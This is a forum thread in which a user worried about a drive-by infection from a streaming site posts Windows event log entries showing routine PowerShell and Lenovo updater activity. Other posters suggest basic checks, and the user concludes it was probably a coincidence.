Did I get Hacked - drive-by?

MPREv2 · 18 Oct 2023

Hi all,

I'm just asking myself if I got infected by an drive by download.

What Happend:
It happened yesterday, when I opened a page to a maybe (?) un-trust worthy (?) website (Streaming).
At that almost very moment an Console (don't know if Batch or Powershell) window, a few lines of code run over the screen
(was really only a few, not even a full "console window") and got closed again, before I even could click in it (I tried first to visualize what this window is doing).

Now I'm asking myself if I got a problem ...
* I didn't know if the site was OK?
* Was it just a coincident?
* I didn't know what the window was doing

What I did/checked
* Windows 10 Pro (22H2 19045.3570) -> Is up to date
* Mozilla FireFox -> Is up to date
* Did a "Quick Scan" from the Windows Security -> no Threads found
* Did a "Full Scan" with form the Windows Security -> no Threads found
* scanned visually the Windows event log in the time frame (about 5 minutes)... but don't know if/what I found (some of them multiple with slightly different IDs:

Installation Started: Windows has started installing the following update: Security Intelligence Update for Microsoft Defender Antivirus - KB2267602 (Version 1.399.817.0)

A service was installed in the system.



Service Name: Universal Device Client Service

Service File Name: "%SystemRoot%\System32\drivers\Lenovo\udc\Service\UDClientService.exe"

Service Type: Benutzermodusdienst

Service Start Type: Automatisch starten

Service Account: LocalSystem

 HostName=ConsoleHost

HostVersion=5.1.19041.3570

HostId=c3347a4e-097a-4a54-a1e9-xxxxxxxxxxxx

HostApplication=powershell.exe -ExecutionPolicy Restricted -Command $Res = 0; $Infs = Get-Item -Path ($env:WinDir + '\inf\*.inf'); foreach ($Inf in $Infs) { $Data = Get-Content $Inf.FullName; if ($Data -match '\[defaultinstall.nt(amd64|arm|arm64|x86)\]') { $Res = 1; break; } } Write-Host 'Final result:', $Res;

EngineVersion=5.1.19041.3570

RunspaceId=d589f20f-7f05-49d5-9286-xxxxxxxxxxxx



HostName=ConsoleHost

HostVersion=5.1.19041.3570

HostId=aabce0e3-491d-42a6-92f4-xxxxxxxxxxxx

HostApplication=C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive get-computerinfo -Property OSName > C:\Windows\TEMP\154CA6D5-395C-41AB-BDF3-xxxxxxxxxxxx

EngineVersion=5.1.19041.3570

RunspaceId=d22d22e7-37a9-488a-b900-xxxxxxxxxxxx



HostName=ConsoleHost

HostVersion=5.1.19041.3570

HostId=c5959b2b-1034-406b-a4aa-xxxxxxxxxxxx

HostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';

EngineVersion=

RunspaceId=



HostName=ConsoleHost

HostVersion=5.1.19041.3570

HostId=12b9f201-5800-4686-8225-xxxxxxxxxxxx

HostApplication=C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -NoProfile -NonInteractive -WindowStyle Hidden -File C:\ProgramData\Lenovo\iMController\Plugins\LenovoUdcForImcPackage_\x64\Install.PS1

EngineVersion=5.1.19041.3570

RunspaceId=c6706785-50af-4212-b478-xxxxxxxxxxxx

What I plan next:
* Running an "Offline Scan" with form the Windows Security
* saving data that is not covered by my data backup (unfortunately I do not have a Sys BackUp, have to check how I would do a clean install)
* Think about running other on demand scans (suggestions welcome)
* decide if I do a clean install.

Any Other suggestions?

Samuria · 18 Oct 2023

What's running at startup and post your host file as text have you got any recent restore points may be worth doing a system restore

MPREv2 · 19 Oct 2023

I checked the hosts file -> nothing changed there.
The Offline Scan showed as well no threads.
As well the running at startup (checked with Autoruns form sysinternals) do not show anything suspicious.

I think more and more, that it was just a normal process (e.g. the mentioned Lenovo Updates) and just a coincident ...

... but as I do see a restore point on 2023-10-15 =)